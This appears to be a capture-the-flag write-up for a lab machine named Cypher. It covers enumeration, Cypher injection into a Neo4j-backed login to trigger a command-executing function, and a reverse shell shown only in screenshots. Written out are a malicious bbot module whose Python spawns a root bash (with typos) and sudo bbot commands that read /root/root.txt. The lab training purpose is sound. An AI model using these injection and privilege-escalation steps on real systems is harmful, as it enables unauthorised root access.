# Cypher

# 1. Enumeration

Start using nmap to enumerate open tcp ports

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image.png)

A nginx web application running on port 80, looks like a simple web application, there are almost any functionality on here

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%201.png)

We can sign in but we have no credentials yet

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%202.png)

Use wfuzz to discover directories available without authentication, testing is a one that we have not checked

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%203.png)

A jar artifact that seems to be own of this web application

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%204.png)

# 2. User flag

Let’s analyze this .jar file using jd-gui (java-decompiler) this is a custom application `getUrlStatusCode` that receives a url to obtain its url status code, now we need a way to call this function and inject this command 

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%205.png)

We haven’t got many options, check if the username in the sign in form is sanitized

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%206.png)

Effectively it is vulnerable, but this is not sql injection, as we can see, some information is disclosed in the error message, it is running neo4j database, and the query is also shown

```c
MATCH (u:USER)-[SECRET]->(h.SHA1) WHERE u.name = 'username' return h.value as hash
```

The procedure to build a valid cypher injection is:

- We need to close the query as it normally would
- Perform a function call to trigger the command executed in `getUrlStatusCode`
- We need to be sure, the neo4j engine perform the query correctly without errors, use YIELD to return the status code dicted in the function to the query, then return this value to the query return

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%207.png)

As we can see it is being executed, the only problem is the name of the function, check the class where the function is defined to call it properly

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%208.png)

Now it’s time to inject the reverse shell in the url parameter expected by the function 

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%209.png)

It has run correctly, a shell with neo4j user is returned 

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%2010.png)

Moving around, enumerating other users and their directories we found read permissions over a files in graphasm directory with neo4j credentials

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%2011.png)

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%2012.png)

Those creds are being reused to get the user flag

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%2013.png)

# 3.Priv esc

This user has the ability to run bbot binary as root

<aside>
💡

bbot is a scanning tool, used for enumerating and reconnaissance, focusing on OSINT for penetration testing purposes

</aside>

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%2014.png)

Searching on internet there are malicious modules we can use it to spawn a shell as root

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%2015.png)

```python
##preset.yml
description: HAHA PWNED
module_dirs:
	-.
modules:
	-systeminfo_enum
```

```python
#systeminfo_enum.py
from bbot.modules.base import BaseModule
import pty
import os

class systeninfo_enum(BaseModule):
	watched_events = []
	produced_events = []
	meta = {"description":"You will be pwned"}
	
	#setup called when the module is initialized
	async def setup(self):
		sef.hugesuccess("Set-up called - pwned!!@@!")
		try:
			pty.spawn(["/bin/bash", "-p"])
			except Exception as e:
			self.error(f"Somethin wrong {e}")
		return True
		
```

All bbot even modules running as root

![image.png](Cypher%201ffb9525529180958a34c8bfaa72d3e0/image%2016.png)

If we only want the flag we can avoid this module method and use the next flags

```c
sudo /usr/local/bin/bbot -t /root/root.txt -d
sudo /usr/local/bin/bbot --custom-yara-rules /root/root.txt -debug
```

Machine pwned!@!@!!